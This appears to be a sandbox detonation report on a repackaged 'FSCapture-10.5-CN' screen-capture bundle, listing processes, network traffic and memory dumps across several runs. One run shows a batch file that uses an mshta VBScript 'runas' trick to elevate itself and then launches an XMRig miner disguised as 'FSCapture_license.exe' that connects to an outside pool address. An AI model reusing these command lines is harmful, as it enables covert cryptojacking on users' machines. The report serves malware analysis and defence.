US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

memory/3888-0-0x0000025BEE740000-0x0000025BEE741000-memory.dmp

memory/3888-1-0x0000000000FF0000-0x0000000001387000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

140s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Network

N/A

Files

memory/2244-0-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2244-1-0x0000000007370000-0x000000000738E000-memory.dmp

memory/2244-4-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2244-3-0x0000000000380000-0x0000000000A8F000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 2536 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2536 -ip 2536

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 660

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

154s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT","goto :target","","runas",1)(window.close)

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT" goto :target

C:\Windows\system32\taskkill.exe

taskkill /f /t /im FSCapture_license.exe

C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe

FSCapture_license.exe -o 104.168.101.23:34512 -t 7 -B -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 104.168.101.23:34512 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 23.101.168.104.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/4456-2-0x0000000001080000-0x00000000010A0000-memory.dmp

memory/4456-3-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-4-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-5-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-6-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-7-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-8-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-9-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-10-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-11-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-12-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-13-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-14-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-15-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-16-0x0000000000400000-0x0000000000E80000-memory.dmp